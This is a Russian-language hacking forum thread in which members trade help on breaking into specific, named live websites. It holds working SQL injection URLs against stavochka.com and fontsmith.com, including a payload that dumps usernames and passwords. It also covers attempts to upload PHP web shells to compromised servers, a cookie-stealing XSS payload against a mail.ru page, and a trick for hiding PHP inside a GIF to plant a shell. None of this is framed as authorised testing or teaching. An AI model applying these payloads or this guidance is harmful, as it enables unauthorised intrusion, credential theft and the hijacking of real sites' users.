Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Куда не пробую, не выходит...

    "Can't create/write to file '/home/httpd/vhosts/site.org/httpdocs/images/c.php' (Errcode: 13)"
    Искал папку tmp, чаще всего просто встречал-не нашёл.

    Инклуда нет, я не нашёл.Двиг баганый, я уже заливал на многие такие же через админку, нормально аплоадило, расширение не менялось.Вот первый раз столкнулся.
    Если у кого есть желание посмотреть, могу в пм скинуть данные для доступа в админку и саму скулю.
     
  2. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Не хватает прав, ищи диру доступную для записи..
    Можешь скинуть в личку, посмотрю, ради интереса.
     
  3. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Народ подскажите какой префикс у таблиц форума http://www.stavochka.com/forum/index.php а то я ужо за''''ся =)
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://up.cih.ms/ettee/sql/

    По дефолту
    phpbb_
     
  5. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    jokester, там не дефолт... Не канает phpbb_ Вот смотри сам..
    http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%201,2,3,4,username,6,7,8,9,10%20%20from%20phpbb_users--

    Есть подозрение что там ваще без префикса

    http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%201,2,3,4,username,6,7,8,9,10%20%20from%20users--
    Но тогда почему нету user_password ?? блин.
     
  6. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.new.stavochka.com/view.php?contentid=999999999999+union+select+1,2,3,4,concat_ws(0x2F,username,userpassword),6,7,8,9,10+from+users--

    Смотри сурс странички авторизации

    <input name=userpassword size=18 type=password>

    Бывает, что совпадает с именем колумна (но не всегда конечно). А таблицы форума могут лежать в другой базе, к которой вообще может не быть доступа
     
    2 people like this.
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    ElteRUS, спс. + воткнуть не могу седня уже исчерпал лимит!!
     
  8. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет, сорри за нубский вопрос, залил пхп шелл на один сайт и обнаружил, что кроме него там еще две сотни, файл я могу залить папку к каждому, и вот я заливаю шелл в нужную мне папку, дергаю из браузера, но пхп не интерпретируется, файлы используются cfm (получается в одной папке пхп катит, в другой - нет), я бы залил хтаксес, но там Microsoft-IIS/5.0 сервак. Как залить шелл? Спасибо

    зы: нужно для общего развития)
     
  9. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Че-то я не пойму как раскрутить её
    http://www.fontsmith.com/custom.php?id=807
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    S0ulVortex, слепая скуля.
    Code:
    http://www.fontsmith.com/custom.php?id=9'+union+select+1,2,3,4,5,6,7,8,9/*
    проблема в том что стоит два (или четыре) подряд запроса с разным количеством полей в запросе и параметр подставляется туда и туда. Получается если заюзать количество столбиков в юнионе которое равно количеству в первом запросе, то второй выдаст ошибку, если равное количеству во втором то ошибку выдаст первый, если вообще левое, то ОБА выдадут ошибку (это и есть твои 4 ошибки).
     
    1 person likes this.
  11. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Вопрос:
    допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

    Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    так. статьи почитай, в них все это описано. от Micr0b'a например.
     
    _________________________
  13. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Да я уже везде полазил.
    Именно этот момент не уточнён, со скриптом или без.
     
  14. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Народ чет не понятен вопрос шелл через картинку
    вставляю в конец файла(.gif) (открытым блокнотом) к примеру

    <?php
    echo "zzzzz"
    ?>

    Он у меня заливает но картинка становиться большой 8*292 x 8*292 пикселей
    И не выводиться "zzzzz"
    Что делать? С чем это едят?
     
  15. YoriK

    YoriK Elder - Старейшина

    Joined:
    12 Sep 2006
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Задумывался над тем же вопросом. Хорошая статья разора.

    http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/
     
  16. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    YoriK мне эта статья не нужна так как там юзаеться программа спец. а мне нужно через блокнот это все
     
  17. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    всё начиналось очень хорошо, пока дело не дошло до вывода админских логинов:паролей..
    значит запрос такой:

    и в ответ ничего кроме всяческих ошибок.. что можно сделать?
     
  18. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    concat(tp) - что это? убери concat
     
  19. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    =-1+union+select+1,tp+from+events--

    тоже самое!
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Проверь, есть ли записи в таблице и в какой она бд.
     
Thread Status:
Not open for further replies.